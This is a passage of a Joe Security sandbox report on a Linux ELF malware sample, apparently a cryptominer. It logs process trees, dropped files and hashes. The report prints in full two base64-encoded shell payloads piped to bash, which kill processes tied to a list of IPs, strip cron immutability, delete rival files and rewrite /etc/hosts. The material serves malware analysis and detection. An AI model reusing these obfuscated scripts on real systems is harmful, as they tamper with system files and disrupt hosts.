(PID: 21059, Parent: 20803, MD5: 78d9a4b9c73de4d9fb0257c5588d67b1) Arguments: netstat -antp bash New Fork (PID: 21060, Parent: 20803) grep (PID: 21060, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -E 103.3.62.64|104.140.201.102|104.140.201.42|104.140.201.58|104.140.201.62|104.140.244.186|107.191.99.221|107.191.99.95|119.9.76.107|123.59.232.42|131.153.56.98 |131.153.76.130|138.201.36.249|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.7 4|139.99.120.50|139.99.120.73|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109| 144.217.14.139|149.202.42.174|1 .83.171|151.80.144.188|151.80.144.253|158.69.25.71|158.69.25.77|164.132.109.110|172.104.165.191|172.105.211.250|172.83.155.151:80|178.63.100.197|192.99.69.170 |207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|37.187.154.79|37.187.95.110|37.59.43.131|37.59.43.136|37.59.44.193|37.59.44.93|37.59.45.174|37.59.5 4.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|47.101.30.124|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.1 5.78.68|51.255.34.118|51.25 9|51.255.34.80|5.196.13.29|5.196.23.240|5.196.26.96|54.37.7.208|61.155.221.74|66.42.105.146|79.137.82.5|88.99.193.240|88.99.242.92|91.121.140.167|91.121.2.76|92. 222.10.59|92.222.180.119|94.130.12.27|94.130.12.30|94.130.165.85|94.130.165.87|94.23.23.52|94.23.247.226 bash New Fork (PID: 21061, Parent: 20803) awk (PID: 21061, Parent: 20803, MD5: 1bb5d753c2edd5bae269563a5ec6d0fe) Arguments: awk "{print $NF}" bash New Fork (PID: 21062, Parent: 20803) cut (PID: 21062, Parent: 20803, MD5: af0cd4efc9e34a60050e61faac91842d) Arguments: cut -d/ -f1 bash New Fork (PID: 21063, Parent: 20803) xargs (PID: 21063, Parent: 20803, MD5: d189c4a6ecfb0ca3f5c869690733dd0c) Arguments: xargs kill -9 xargs New Fork (PID: 21104, Parent: 21063) kill (PID: 21104, Parent: 21063, MD5: 5484331628ba283a0cda9730dafe47f8) Arguments: kill -9 bash New Fork (PID: 21105, Parent: 20803) rm (PID: 21105, Parent: 20803, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /home/user/.aliyun* /home/user/.systemd* /home/user/.tmp* /home/user/.trump* /home/user/.wget* /etc/cron.d/*aliyun* /etc/cron.d/*systemd* /etc/cron.d/*trump* /opt/*aliyun* /opt/*systemd* /opt/*trump* bash New Fork (PID: 21106, Parent: 20803) cat (PID: 21106, Parent: 20803, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.X11-unix/01 bash New Fork (PID: 21107, Parent: 20803) cat (PID: 21107, Parent: 20803, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /tmp/.X11-unix/0 bash New Fork (PID: 21108, Parent: 20803) grep (PID: 21108, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q trump /etc/hosts bash New Fork (PID: 21109, Parent: 20803) grep (PID: 21109, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q tor2w /etc/hosts bash New Fork (PID: 21110, Parent: 20803) grep (PID: 21110, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 aliyun.one" /etc/hosts bash New Fork (PID: 21111, Parent: 20803) grep (PID: 21111, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 lsd.systemten.org" /etc/hosts bash New Fork (PID: 21112, Parent: 20803) grep (PID: 21112, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 pastebin.com" /etc/hosts bash New Fork (PID: 21114, Parent: 20803) grep (PID: 21114, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 pm.cpuminerpool.com" /etc/hosts bash New Fork (PID: 21117, Parent: 20803) grep (PID: 21117, Parent: 20803, MD5: fc9b0a0ff848b35b3716768695bf2427) Arguments: grep -q "0.0.0.0 systemten.org" /etc/hosts cleanup
Created / dropped Files
/etc/hosts Process: /bin/bash File Type: ASCII text Size (bytes): 116 Entropy (8bit): 3.9012421126820302 Encrypted: false MD5: 91272B0F949D00E3ED2657A018487FAC SHA1: CBEDB785322902FB093AFA4442745CA4DA109098 SHA-256: E3340DAB8F8F22EBD885194EFC97720A5C4F99B145BDE9CE3EDB39F4C7A2543C SHA-512: D721A7DB8F73A1C277B331CD2347C58A0B4A9DFBA04F96A5B5D6AA98E32A325DF64D10933A582B2F6AE021A5CBA2E7F497FC001254C4A1F86523FDE45A20B94 4 Malicious: false Reputation: low Preview: 0.0.0.0 aliyun.one.0.0.0.0 lsd.systemten.org.0.0.0.0 pastebin.com.0.0.0.0 pm.cpuminerpool.com.0.0.0.0 systemten.org.
/tmp/.X11-unix/00 Process: /tmp/RCxcx0vm78.bin File Type: ASCII text Size (bytes): 6 Copyright Joe Security LLC 2020 Page 13 of 38 /tmp/.X11-unix/00 Entropy (8bit): 2.2516291673878226 Encrypted: false MD5: 9AD53470398219A6CBD816E8849E105C SHA1: 8195222572074CAB80702FE3EBA7D24219B16616 SHA-256: 3541D19DDEC93F3E08A42ECF32A08E40FE52BE81E246528B77F760FCC1BD639F SHA-512: 771DD55DF148EC1C6D6FAF68C801DE037705D2356E29DC1AF1F352350D814849A55EF904A9FCAD75CCEAF09781FCB4EF248A44EA24E7400CFC87BFE3F8B3343 1 Malicious: false Reputation: low Preview: 20790.
/var/spool/cron/crontabs/tmp.pKGrnA
Process: /usr/bin/crontab File Type: ASCII text Size (bytes): 175 Entropy (8bit): 5.015323106207194 Encrypted: false MD5: 6A0213DFD0F8E65B23ADFFA002692833 SHA1: 60419FF7AC94BFC1AF18B5AB776413C8C0427F43 SHA-256: D6CBD1184F0BF0FA89EF1CC04F81F0CD54211646761ADD5F62CAD10C27A5AE0A SHA-512: BC6F8965DC8A52CDE4F04D46051140AF7C516E122843A0C4F4B2D8BF4E1F132C0FB45C1D4A74364AE2896B9938199DCE30873435197EF07EC1B8B71BDB3F2341 Malicious: true Reputation: low Preview: # DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Thu Jan 2 20:30:37 2020).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Ex p $).
Domains and IPs
Contacted Domains
No contacted domains info
Contacted IPs
No contacted IP infos
Static File Info
General File type: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped Entropy (8bit): 7.91304870639992 TrID: ELF Executable and Linkable format (generic) (4004/1) 100.00% File name: RCxcx0vm78.bin File size: 23448 MD5: 885076641a9489ed1404c3c504b7303d SHA1: 80102e6da770e1ebc3f1101e071a2483b55744c2 SHA256: e03a4dae8ef565cedd3ef4c4d27203153d70f68dfcac94e 3b71c5459ab3de19f SHA512: f3c67c5723fa3d0d24547854ee33112ceef908d318832a8 9ba69ef550ece7d13431c9f147de17f76ed5621a1ff2ca1d 8928ad17d39efb6055c7583e91cdd395d SSDEEP: 384:UiOlSGi9DUN1cj4J8UCkGISJAhkHNPOZp6uopnPl 4dKonUxaVXALEMe9sPO1wJm0:bOgG5N2j4JMkGISJ AKtP4pzkl4Brv9s7 File Content Preview: .ELF...... >...... H@.....@...... @.8...@...... @...... @.....YZ...... YZ...... `@...... ` @...... C ...... Q.td...... I..E.bss......
Copyright Joe Security LLC 2020 Page 14 of 38 Static ELF Info
ELF header Class: ELF64 Data: 2's complement, little endian Version: 1 (current) Machine: Advanced Micro Devices X86-64 Version Number: 0x1 Type: EXEC (Executable file) OS/ABI: UNIX - System V ABI Version: 0 Entry Point Address: 0x4048b8 Flags: 0x0 ELF Header Size: 64 Program Header Offset: 64 Program Header Size: 56 Number of Program Headers: 3 Section Header Offset: 0 Section Header Size: 64 Number of Section Headers: 0 Header String Table Index: 0
Program Segments
Physical Flags Type Offset Virtual Address Address File Size Memory Size Flags Description Align Prog Interpreter Section Mappings LOAD 0x0 0x400000 0x400000 0x5a59 0x5a59 0x5 R E 0x200000 LOAD 0x0 0x406000 0x406000 0x0 0x204318 0x6 RW 0x1000 GNU_STACK 0x0 0x0 0x0 0x0 0x0 0x6 RW 0x10
Network Behavior
UDP Packets
System Behavior
Analysis Process: RCxcx0vm78.bin PID: 20750 Parent PID: 20707
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: /tmp/RCxcx0vm78.bin File size: 0 bytes MD5 hash: unknown
File Activities
File Deleted
Analysis Process: RCxcx0vm78.bin PID: 20757 Parent PID: 20750
General
Copyright Joe Security LLC 2020 Page 15 of 38 Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown
Analysis Process: sh PID: 20757 Parent PID: 20750
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: sh -c "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;ec ho bHMgL3RtcC8uWDExLXVuaXggfHwgbWtkaXIgLXAgL3RtcC8uWDExLXVuaXgK|base64 -d|bash" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20761 Parent PID: 20757
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: sh PID: 20762 Parent PID: 20757
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: base64 PID: 20762 Parent PID: 20757
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/base64 Arguments: base64 -d
Copyright Joe Security LLC 2020 Page 16 of 38 File size: 39664 bytes MD5 hash: 855d7e0819b22d9cfca26f75fbcdf4ed
File Activities
File Read
Analysis Process: sh PID: 20763 Parent PID: 20757
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: bash PID: 20763 Parent PID: 20757
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: bash File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
File Activities
File Read
Analysis Process: bash PID: 20776 Parent PID: 20763
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: ls PID: 20776 Parent PID: 20763
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/ls Arguments: ls /tmp/.X11-unix File size: 126584 bytes MD5 hash: f3b92d795c9ee0725c160680acd084d9
Copyright Joe Security LLC 2020 Page 17 of 38 File Activities
File Read
Directory Enumerated
Analysis Process: bash PID: 20781 Parent PID: 20763
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: mkdir PID: 20781 Parent PID: 20763
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/mkdir Arguments: mkdir -p /tmp/.X11-unix File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41
File Activities
File Read
Directory Created
Analysis Process: RCxcx0vm78.bin PID: 20790 Parent PID: 20750
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown
File Activities
File Written
Analysis Process: RCxcx0vm78.bin PID: 20796 Parent PID: 20790
General
Start time: 19:30:37
Copyright Joe Security LLC 2020 Page 18 of 38 Start date: 02/01/2020 Path: /tmp/RCxcx0vm78.bin Arguments: n/a File size: 0 bytes MD5 hash: unknown
Analysis Process: sh PID: 20796 Parent PID: 20790
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: sh -c "echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2 JpbjovdXNyL2xvY2FsL3NiaW4KZmluZCB+Ly5kZGcvKnx4YXJncyBmdXNlciAtawpmaW5kIC9ldGMvY3Jvbip8eGFyZ3MgY2hhdH RyIC1pCmZpbmQgL3Zhci9zcG9vbC9jcm9uKnx4YXJncyBjaGF0dHIgLWkKY3JvbnRhYiAtbCB8Z3JlcCAtaXZFICIuXC9va2F8XC 91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxzeXN0ZW1kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHg xfHgxMSJ8Y3JvbnRhYiAtCmdyZXAgLVJFICIuXC9va2F8XC91cGR8YWxpeXVufGN1cmx8anF1ZXIuanN8a2lsbF9tfG1tbXxze" kfHRtcDAwfHRyb2phbnx0cnVtcHx2aXJ1c3x3Z2V0fHgxfHgxMSIgL2V0Yy9jcm9uLip8Y3V0IC1mIDEgLWQgOnx4YXJncyBybSAt Zgpwa2lsbCAtOSAtZiAiLi9jcm9ufC4vb2thfC90bXAvZGRnc3wvdG1wL2lka3wvdG1wL2phdmF8L3RtcC9rZWVwfC90bXAvdWRldn N8L3RtcC91ZGt8L3RtcC91cGRhdGUuc2h8L3RtcC95YXJufC91c3IvYmluL25ldGZzfDgyMjB8QWxpSGlkc3xBbGlZdW5EdW58R G9uYWxkfEhUOHN8Sm9uYXNvbnxTemRYTXxYMTMtdW5peHxYMTctdW5peHxcW3N0ZWFcXXxhZWdpc198YWxpeXVuLXNlc nZpY2V8YXppcGx8Y3Iuc2h8Y3Jsb2dlcnxjcm9uZHN8Y3J1bnxjcnlwdG9uaWdodHxjdXJufGN1cnJufGRkZ3N8ZGhjbGVpbnR8Zn MtbWFuYWdlc yOG11bHxoYXZlZ2Vkc3xodHRwZHp8aXJxYmFsYW5jZWR8amF2YS1jfGthdWRpdGVkfGtlcmJlcm9kc3xraHVnZXBhZ2Vkc3xra W50ZWdyaXR5ZHN8a3BzbW91c2Vkc3xrc3dhcGVkfGt0aHJvdGxkc3xrdzB8a3dvcmtlcmRzfGt3b3JrcmV8a3dyb2tlcnxtZXdyc3xt aWdyYXRpb25zfG1pbmVyfG1tbXxtci5zaHxtdWhzdGl8bXlnaXR8bmV0ZG5zfG5ldHdvcmtzZXJ2aWNlfG9yZ2ZzfHBhbWRpY2tzf HBhc3RlYmlufHFXM3hUfHF3ZWZkYXN8cmN0bGNsaXxzbGVlcHxzdHJhdHVtfHN1c3Rlc3xzdXN0c2V8c3lzZ3VhcmR8c3lzdGVh bWR8c3lzdGVtZC1uZXR3b3JrfHN5c3VwZGF0ZXx0MDBsc3x0aGlzeHhzfFRydW1wfHVwZGF0ZS5zaHx2VHRISHx3YXRjaGJvZ 3x3YXRja 3YXRjaG9nfHdpcGVmc3x3blRLWWd8eDNXcXx4aWd8eG1yfHplcjAiCm5ldHN0YXQgLWFudHB8Z3JlcCAtRSAiMTAzLjMuNjIuNj R8MTA0LjE0MC4yMDEuMTAyfDEwNC4xNDAuMjAxLjQyfDEwNC4xNDAuMjAxLjU4fDEwNC4xNDAuMjAxLjYyfDEwNC4xNDAu MjQ0LjE4NnwxMDcuMTkxLjk5LjIyMXwxMDcuMTkxLjk5Ljk1fDExOS45Ljc2LjEwN3wxMjMuNTkuMjMyLjQyfDEzMS4xNTMuNTYu OTh8MTMxLjE1My43Ni4xMzB8MTM4LjIwMS4zNi4yNDl8MTM5LjE2Mi44MS45MHwxMzkuOTkuMTAxLjE5N3wxMzkuOTkuMTA xLjE5OHwxMzkuOTkuMTAxLjIzMnwxMzkuOTkuMTAyLjcwfDEzOS45OS4xMDIuNzF8MTM5Ljk5LjEwMi43MnwxMzkuOTkuMTA yLjczfDEzOS45OS4xMDIuN 5Ljk5LjEyMC41MHwxMzkuOTkuMTIwLjczfDEzOS45OS4xMjAuNzV8MTM5Ljk5LjEyMy4xOTZ8MTM5Ljk5LjEyNC4xNzB8MTM5L jk5LjEyNS4zOHwxMzkuOTkuMTU2LjMwfDEzOS45OS42OC4xMjh8MTQyLjQ0LjI0Mi4xMDB8MTQyLjQ0LjI0My42fDE0NC4yMTc uMTQuMTA5fDE0NC4yMTcuMTQuMTM5fDE0OS4yMDIuNDIuMTc0fDE0OS4yMDIuODMuMTcxfDE1MS44MC4xNDQuMTg4fD E1MS44MC4xNDQuMjUzfDE1OC42OS4yNS43MXwxNTguNjkuMjUuNzd8MTY0LjEzMi4xMDkuMTEwfDE3Mi4xMDQuMTY1LjE5 MXwxNzIuMTA1LjIxMS4yNTB8MTcyLjgzLjE1NS4xNTE6ODB8MTc4LjYzLjEwMC4xOTd8MTkyLjk5LjY5LjE3MHwyMDcuMjQ2Lj EwMC4xOTh8MjEzLjMyLjI5LjE0M uMzIuNzQuMTU3fDIxNy4xODIuMTY5LjE0OHwzNy4xODcuMTU0Ljc5fDM3LjE4Ny45NS4xMTB8MzcuNTkuNDMuMTMxfDM3LjU 5LjQzLjEzNnwzNy41OS40NC4xOTN8MzcuNTkuNDQuOTN8MzcuNTkuNDUuMTc0fDM3LjU5LjU0LjIwNXwzNy41OS41NS42MH wzNy45LjMuMjZ8NDUuMzIuNzEuODJ8NDUuNzYuNjUuMjIzfDQ3LjEwMS4zMC4xMjR8NTEuMTUuNTQuMTAyfDUxLjE1LjU1LjE wMHw1MS4xNS41NS4xNjJ8NTEuMTUuNTguMjI0fDUxLjE1LjY1LjE4Mnw1MS4xNS42Ny4xN3w1MS4xNS42OS4xMzZ8NTEuM TUuNzguNjh8NTEuMjU1LjM0LjExOHw1MS4yNTUuMzQuNzl8NTEuMjU1LjM0LjgwfDUuMTk2LjEzLjI5fDUuMTk2LjIzLjI0MHw1Lj E5Ni4yNi45Nnw1NC4zNy43L 2MS4xNTUuMjIxLjc0fDY2LjQyLjEwNS4xNDZ8NzkuMTM3LjgyLjV8ODguOTkuMTkzLjI0MHw4OC45OS4yNDIuOTJ8OTEuMTIxLj E0MC4xNjd8OTEuMTIxLjIuNzZ8OTIuMjIyLjEwLjU5fDkyLjIyMi4xODAuMTE5fDk0LjEzMC4xMi4yN3w5NC4xMzAuMTIuMzB8OT QuMTMwLjE2NS44NXw5NC4xMzAuMTY1Ljg3fDk0LjIzLjIzLjUyfDk0LjIzLjI0Ny4yMjYifGF3ayB7J3ByaW50ICRORid9IHxjdXQgL WQvIC1mMXx4YXJncyBraWxsIC05CnJtIC1mIH4vLnthbGl5dW4qLHN5c3RlbWQqLHRtcCosdHJ1bXAqLHdnZXQqfSAvZXRjL2N yb24uZC97KmFsaXl1biosKnN5c3RlbWQqLCp0cnVtcCp9IC9vcHQveyphbGl5dW4qLCpzeXN0ZW1kKiwqdHJ1bXAqfSAKa2lsbC AtOSAkK vdG1wLy5YMTEtdW5peC8wMSkKa2lsbCAtOSAkKGNhdCAvdG1wLy5YMTEtdW5peC8wKQpncmVwIC1xIHRydW1wIC9ldGMva G9zdHMgJiYgc2VkIC1pICcvdHJ1bXAvZCcgL2V0Yy9ob3N0cwpncmVwIC1xIHRvcjJ3IC9ldGMvaG9zdHMgJiYgc2VkIC1pICcvdG 9yMncvZCcgL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIGFsaXl1bi5vbmUiIC9ldGMvaG9zdHMgfHwgZWNobyAiMC4wLjAuM CBhbGl5dW4ub25lIiA+PiAvZXRjL2hvc3RzCmdyZXAgLXEgIjAuMC4wLjAgbHNkLnN5c3RlbXRlbi5vcmciIC9ldGMvaG9zdHMgfHw gZWNobyAiMC4wLjAuMCBsc2Quc3lzdGVtdGVuLm9yZyIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBhc3RlYmluLm NvbSIgL2V0Y "0cyB8fCBlY2hvICIwLjAuMC4wIHBhc3RlYmluLmNvbSIgPj4gL2V0Yy9ob3N0cwpncmVwIC1xICIwLjAuMC4wIHBtLmNwdW1pbm VycG9vbC5jb20iIC9ldGMvaG9zdHMgfHwgZWNobyAiMC4wLjAuMCBwbS5jcHVtaW5lcnBvb2wuY29tIiA+PiAvZXRjL2hvc3RzCm dyZXAgLXEgIjAuMC4wLjAgc3lzdGVtdGVuLm9yZyIgL2V0Yy9ob3N0cyB8fCBlY2hvICIwLjAuMC4wIHN5c3RlbXRlbi5vcmciID4+IC 9ldGMvaG9zdHMKCg== |base64 -d|bash" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
File Activities
File Read
Analysis Process: sh PID: 20801 Parent PID: 20796
Copyright Joe Security LLC 2020 Page 19 of 38 General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: sh PID: 20802 Parent PID: 20796
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: base64 PID: 20802 Parent PID: 20796
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/base64 Arguments: base64 -d File size: 39664 bytes MD5 hash: 855d7e0819b22d9cfca26f75fbcdf4ed
File Activities
File Read
Analysis Process: sh PID: 20803 Parent PID: 20796
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c
Analysis Process: bash PID: 20803 Parent PID: 20796
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: bash File size: 1037528 bytes
Copyright Joe Security LLC 2020 Page 20 of 38 MD5 hash: 5e666695cf08d1638bb85684e30185ee
File Activities
File Read
File Written
Directory Enumerated
Analysis Process: bash PID: 20825 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: find PID: 20825 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /home/user/.ddg/* File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d
File Activities
File Read
Analysis Process: bash PID: 20826 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: xargs PID: 20826 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs
Copyright Joe Security LLC 2020 Page 21 of 38 Arguments: xargs fuser -k File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
File Read
Directory Enumerated
Analysis Process: xargs PID: 20832 Parent PID: 20826
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
Directory Enumerated
Analysis Process: fuser PID: 20832 Parent PID: 20826
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/fuser Arguments: fuser -k File size: 36024 bytes MD5 hash: d2e863e32c9f969b17d78c175daadbae
File Activities
File Read
Analysis Process: bash PID: 20859 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
File Activities
Directory Enumerated
Copyright Joe Security LLC 2020 Page 22 of 38 Analysis Process: find PID: 20859 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d
File Activities
File Read
Directory Enumerated
Analysis Process: bash PID: 20860 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: xargs PID: 20860 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs chattr -i File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
File Read
Directory Enumerated
Analysis Process: xargs PID: 20876 Parent PID: 20860
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
Copyright Joe Security LLC 2020 Page 23 of 38 File Activities
Directory Enumerated
Analysis Process: chattr PID: 20876 Parent PID: 20860
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/chattr Arguments: chattr -i /etc/cron.d /etc/cron.d/popularity-contest /etc/cron.d/mdadm /etc/cron.d/php /etc/cron.d/.placeholder /etc/cron.d/anacron /etc/cron.daily /etc/cron.daily/man-db /etc/cron.daily/cracklib-runtime /etc/cron.daily/passwd /etc/cron.daily/popularity-contest /etc/cron.daily/0anacron /etc/cron.daily/bsdmainutils /etc/cron.daily/mdadm /etc/cron.daily/upstart /etc/cron.daily/mlocate /etc/cron.daily/.placeholder /etc/cron.daily/apt-compat /etc/cron.daily/update-notifier-common /etc/cron.daily/logrotate /etc/cron.daily/dpkg /etc/cron.daily/apport /etc/cron.hourly /etc/cron.hourly/.placeholder /etc/cron.monthly /etc/cron.monthly/0anacron /etc/cron.monthly/.placeholder /etc/crontab /etc/cron.weekly /etc/cron.weekly/fstrim /etc/cron.weekly/man-db /etc/cron.weekly/0anacron /etc/cron.weekly/.placeholder /etc/cron.weekly/update-notifier-common File size: 10592 bytes MD5 hash: 8aa970e89963faf71434e3a37222cc49
File Activities
File Read
Analysis Process: bash PID: 20885 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
File Activities
Directory Enumerated
Analysis Process: find PID: 20885 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/find Arguments: find /var/spool/cron File size: 221768 bytes MD5 hash: e9b4574b80985a4dc1c451ee3146311d
File Activities
File Read
Directory Enumerated
Copyright Joe Security LLC 2020 Page 24 of 38 Analysis Process: bash PID: 20886 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: xargs PID: 20886 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: xargs chattr -i File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
File Read
Directory Enumerated
Analysis Process: xargs PID: 20904 Parent PID: 20886
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/xargs Arguments: n/a File size: 67800 bytes MD5 hash: d189c4a6ecfb0ca3f5c869690733dd0c
File Activities
Directory Enumerated
Analysis Process: chattr PID: 20904 Parent PID: 20886
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/chattr Arguments: chattr -i /var/spool/cron /var/spool/cron/crontabs /var/spool/cron/atjobs /var/spool/cron/atjobs/.SEQ /var/spool/cron/atspool File size: 10592 bytes MD5 hash: 8aa970e89963faf71434e3a37222cc49
File Activities
Copyright Joe Security LLC 2020 Page 25 of 38 File Read
Analysis Process: bash PID: 20909 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: crontab PID: 20909 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /usr/bin/crontab Arguments: crontab -l File size: 36080 bytes MD5 hash: ff68fd30f0037fd7e9c1fdf5a035f739
File Activities
File Read
Analysis Process: bash PID: 20910 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/bash Arguments: n/a File size: 1037528 bytes MD5 hash: 5e666695cf08d1638bb85684e30185ee
Analysis Process: grep PID: 20910 Parent PID: 20803
General
Start time: 19:30:37 Start date: 02/01/2020 Path: /bin/grep Arguments: grep -ivE .\\/oka|\\/upd|aliyun|curl|jquer.js|kill_m|mmm|systemd|tmp00|trojan|trump|virus|wget|x1|x11 File size: 211224 bytes MD5 hash: fc9b0a0ff848b35b3716768695bf2427
File Activities
File Read
Copyright Joe Security LLC 2020 Page 26 of 38 Analysis Process: bash PID: 20911 Parent PID: 20803
General
